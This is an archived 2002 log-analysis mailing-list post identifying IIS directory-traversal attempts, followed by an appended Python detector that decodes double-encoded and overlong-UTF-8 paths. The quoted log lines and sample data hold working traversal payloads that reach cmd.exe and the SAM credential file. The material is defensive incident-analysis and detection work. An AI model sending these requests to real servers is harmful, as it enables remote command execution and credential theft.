On Tue, Jun 11, 2002 at 02:32:43PM -0700, Michael Katz wrote:
> At 6/11/2002 01:03 PM, Tina Bird wrote:
> >Here's what I'm seeing -- anyone have any information on this variant?
> >
> >Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target
> >IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
> >\\*.cif/s/b result="500 Server Error"
> >
> >Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target
> >IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not
> >Found"
> >
> >Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target
> >IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not
> >Found"
>
> This is definitely not Nimda, although it attempts to exploit the same
> directory traversal vulnerability in IIS as Nimda
> (http://www.microsoft.com/technet/security/bulletin/ms00-078.asp). In
> fact, if these are the timestamps and there are no other logs, it appears
> that this attack is being manually performed.

Or that the tool in question inserts random intervals between connection
attempts. I'm not saying that it's likely, just that it's possible.

(Perhaps this should be thrown over to the incidents list? That seems more
appropriate for exploit identification discussions. (Not that they are OT
here, of course, but there are probably more eyes who are familiar with
IDing new variants over there.))

-- Sweth.

--
Sweth Chandramouli
Idiopathic Systems Consulting
svcat_private
http://www.idiopathic.net/

---------------------------------------------------------------------
To unsubscribe, e-mail: loganalysis-unsubscribeat_private
For additional commands, e-mail: loganalysis-helpat_private
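As an added example (not part of the thread), here is a small Python detector that canonicalises the request argument of log lines like the ones quoted above, undoing the double percent-encoding (%255c) and the overlong UTF-8 separators (%c1%1c, %c1%9c) before looking for ".." segments, so that all three variants are caught by one rule instead of one signature per encoding. The log lines and the 192.0.2.10 target are constructed; %c0%af is included as the separator variant described in the MS00-078 bulletin.

```python
import re
from urllib.parse import unquote

# Constructed sample entries in the log format quoted above; 192.0.2.10 is a placeholder target (RFC 5737 range).
SAMPLE_LOGS = [
    'Jun 10 12:53:37.845 op=GET arg=http://192.0.2.10/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\\*.cif/s/b result="500 Server Error"',
    'Jun 10 12:53:39.675 op=GET arg=http://192.0.2.10/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not Found"',
    'Jun 10 12:53:43.578 op=GET arg=http://192.0.2.10/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not Found"',
    'Jun 10 12:54:01.100 op=GET arg=http://192.0.2.10/index.html result="200 OK"',
]

# Overlong UTF-8 sequences the unpatched IIS decoder (MS00-078) treated as path separators after its traversal check.
OVERLONG_SEPARATORS = {"%c0%af": "/", "%c1%9c": "\\", "%c1%1c": "\\"}
OVERLONG_RE = re.compile("|".join(re.escape(k) for k in OVERLONG_SEPARATORS), re.IGNORECASE)
ARG_RE = re.compile(r"arg=(\S+)")


def normalize(url, max_rounds=3):
    """Map overlong sequences to separators, then percent-decode repeatedly (bounded) so
    %255c -> %5c -> '\\'. Returns the URL with '\\' folded to '/' plus the tricks seen."""
    techniques, current = set(), url
    for round_no in range(max_rounds):
        if OVERLONG_RE.search(current):
            techniques.add("overlong-utf8")
            current = OVERLONG_RE.sub(lambda m: OVERLONG_SEPARATORS[m.group(0).lower()], current)
        decoded = unquote(current)
        if decoded == current:
            break
        if round_no > 0:  # a second round only changes something if %25 was hiding another %XX
            techniques.add("double-url-encoding")
        current = decoded
    return current.replace("\\", "/"), techniques


def is_traversal(path):
    # A '..' segment surviving canonicalisation means the request tries to step out of the web root.
    return any(segment == ".." for segment in path.split("/"))


def analyze(lines):
    """Return one finding per log line whose request argument is a traversal attempt."""
    findings = []
    for match in filter(None, map(ARG_RE.search, lines)):
        path, techniques = normalize(match.group(1))
        if is_traversal(path):
            findings.append({"raw": match.group(1), "decoded": path, "techniques": sorted(techniques)})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOGS):
        print(finding["techniques"], "->", finding["decoded"])
```

The bounded decoding loop matters: a single `unquote` pass leaves `%255c` as the harmless-looking `%5c`, which is exactly how the first request slips past a naive ".." filter.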
This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:56:39 PDT